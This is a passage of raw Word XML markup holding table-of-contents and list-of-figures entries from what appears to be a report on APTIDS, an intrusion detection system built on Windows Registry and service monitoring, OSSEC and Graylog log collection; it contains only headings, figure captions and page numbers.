            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</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604" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1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APTIDS</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239604 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</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605" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.1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Registry Monitor module’s source code</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239605 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</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606" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Monitor Module’s source code</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239606 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</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607" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.3</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Log Module function</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239607 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</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608" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.4</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sentry Forensic Source code</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239608 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</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609" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2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Distributed Log Collector Hardware and Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239609 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</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610" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1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Distributed Log Collector Hardware</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239610 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</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611" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.2</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Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239611 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="001D1C85" w:rsidRDefault="00856098">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485239612" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3</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APTIDS Testing</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239612 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="001D1C85" w:rsidRDefault="00856098">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485239613" w:history="1">
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.1</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85" w:rsidRPr="00F83CA9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Manual testing</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485239613 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="001D1C85">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="000C0B89" w:rsidRDefault="000C0B89">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="008F0F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>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1D1C85"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5239529" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.1: OSSEC Processes in a “Server-Agent” Installation</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239529 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</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0" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.2 Cell data type segments in Registry hive.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239530 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>11</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1" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.3 Example of cell indexes</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239531 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</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2" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.4 Configuration Manager implements a strategy for handling noncontiguous memory buffer problems.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239532 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</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3" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.5 Each Windows service is stored as an entry key in the SCM database Registry location</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239533 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</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4" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.6 Each service entry key stores many Registry values that specify its information</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239534 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</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5" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.7 Graylog working model.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239535 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>30</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6" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.8 The correlation between Graylog server and Graylog Collector Sidecar.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239536 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>31</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7" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 2.9 Example configuration of Graylog Collector Sidecar.</w:t>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc485239537 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="001D1C85">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</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8" w:history="1">
        <w:r w:rsidR="001D1C85" w:rsidRPr="00BB1037">
